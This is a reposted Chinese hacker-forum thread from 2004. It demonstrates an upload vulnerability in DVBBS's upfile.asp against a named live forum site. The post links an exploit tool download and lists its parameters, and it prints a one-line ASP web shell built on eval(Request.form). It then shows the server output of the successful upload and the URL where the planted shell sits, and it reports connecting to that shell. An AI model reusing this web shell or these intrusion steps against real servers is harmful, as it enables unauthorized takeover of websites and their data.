‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]DVBBS_upfile.asp演示动画加exploits

冰血封情

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6818 
精华
835 
积分
36108 
阅读权限
255 
性别
男 
来自
中国 
在线时间
577 小时 
注册时间
2004-6-25 
最后登录
2008-7-8 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-6-26 11:39  只看该作者

[转载]DVBBS_upfile.asp演示动画加exploits

信息来源:中国雏鹰联盟

下载地址:http://www.cneyas.com/tool/upfile.rar

Dvbbs upfile.asp漏洞演示

工具 [1]DVBBS_upfile.exe
[2]冰狐浪子木马

演示网站 http://www.tranbbs.com/bbs7/upfile.asp

url: 入侵的网站
port: 动网论坛的服务器的端口
create filename: 上传后建立的文件名
page: upfile.asp的文件目录.!~!
shell : WEB shell 本次演示用冰狐浪子提供的木马

Begin!!
这是冰狐浪子的shell
<script RUNAT=SERVER
LANGUAGE=javascript>eval(Request.form(&#39;#&#39;)+&#39;&#39;)</script>

好.开始!
这是info里返回来的信息!
t="highlightmenu(event,&#39;off&#39;);dynamichide(event)" style="Z-index:100"></div>

<table width=100% border=0 cellspacing="0" cellpadding="0"><tr><td class=tablebody1 width=100% height=100% >
<script>
parent.document.theForm.Submit.disabled=false;
parent.document.theForm.Submit2.disabled=false;
</script>
<script>parent.document.images[&#39;face&#39;].src=&#39;uploadFace/cneyas.asp图片上传成功!

上传成功
好!我们再去看看我们刚刚上传的shell
url: http://www.tranbbs.com/bbs7/uploadface/cneyas.asp

表示成功!我们用客户端连接

看到没有成功了!!

over!

版权所有 中国雏鹰联盟 安全资讯 中华盾安全联盟 黑客零起点

Http://www.cneyas.com

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题